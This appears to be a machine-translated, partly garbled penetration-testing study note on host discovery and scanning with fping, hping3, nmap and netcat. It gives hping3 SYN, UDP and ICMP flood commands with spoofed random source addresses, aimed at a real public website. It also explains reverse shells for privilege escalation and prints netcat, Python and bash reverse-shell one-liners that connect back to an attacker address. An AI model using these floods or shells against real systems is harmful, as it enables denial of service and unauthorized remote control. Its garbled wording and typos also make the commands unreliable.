Found on the third floor （ The network layer ）

The most commonly used ping command , But if the firewall opens , Can not ping To each other . The advantage of three-tier discovery lies in ,arping Only users of the same network segment can be found , And the three-tier discovery can be found Different network segments but interconnected users

fping

Figure 1 has no setting range , Figure 2 sets the start address and end address of scanning , If the range is not set , The default is to sweep from beginning to end .

2>/dev/null To prevent strange output

hping3

It can start ddos attack , It is mainly used for ddos, But it's not easy to test , Once used, it is a threat to yourself and others' Networks .

The data packet should be large , Send it fast

-a：                  Forgery source ip（ Hide oneself ）
-c：                  Number of contracts
-p：                  port
-d：                  Contract size
-i：                    Contract interval
-w：                  Sliding window size
--flood                Send packets as soon as possible , Don't reply
--rand-source     Random source address （-a Is to specify a forgery ip, It's random ）

--udp       udp attack
--icmp      icmp attack
-S            syn attack
-A            ack attack

hping3 --upd -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 --icmp -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 -S -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com

Discovery on the fourth floor （ Transport layer ）

rely on TCP/UDP transmission —— reliable 、TCP Three handshakes of —— It takes a long time

If the firewall is turned off icmp, On the second floor , The three-tier command directly gg, unable ping through , But layer 4 discovery can be detected through ports

nmap

The host found

 -sn： Only detect survival （ be based on icmp, Opening firewall is invalid ）
-Pn： Only detect ports （ It is effective to open the firewall ）

-O ： Operating system detection

Port detection
-sS：tcp syn scanning Scan port （ Commonly used , It is best to , Fast , Good concealment , The third handshake didn't come true ）
-p ： port ,（80,8080）—— Probe 80 and 8080 port

                   （-p-）—— Probe all ports

                     (80-8080)—— Probe 80 To 8080 The port of

nmap The default scanning range is 1——1000

nmap -p -sS 80 192.168.111.131

nmap -p- -sS192.168.111.131

nmap -p 80-8080 -sS192.168.111.131
-sV： Probe service version （ Very important , Exploitable version vulnerability ）
-A ： Comprehensive scanning
-iL： Specify file scan

--exclude：             exclude ip
--excludefile:         Specify file list
--script=vuln：       Common vulnerability scanning

nmap Save and output of

nmap -F -oN test.txt IP/24

  Common port numbers

NC(netcat)

shell—— command interpreter  

rebound shell

Let malicious programs actively connect us

Use scenarios ： Ant sword → The server （ rebound ）kali monitor → Raise the right

-c | -e Execution instruction
-v Details , -vv A more detailed
-l listen monitor
-n ip Specify the connection address in the form of , Non domain name
-p Designated port
-q End delay
-w Timeout time
-z Zero input output , Only scan ports You can specify the range , for example 80-8080

kali Input ip： positive
win7 Input ip： reverse

kali: nc -lvvp 4444 -e 
win7: nc kaliIp 4444 - e cmd

Reverse connection ：

Forward connection ：

  Transfer files ：

Server:nc < fileName
Client:nc > fileName

Port detection ：

  The code to solve ：

  Take reverse connection for example , You will find that there will be garbled codes after the connection is successful

  The reason for garbled code is actually that the codes of the two systems are different

kali:     utf-8 One word accounts for 3 byte
win7： gbk  One word accounts for 2 byte

therefore win7 To kali, There's a mess , Solution ——chcp command

chcp 65001 utf-8
chcp 936 gbk

  Some rebound shell

 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 
bash -c 'exec bash -i &>/dev/tcp/10.0.0.3/4444 <&1'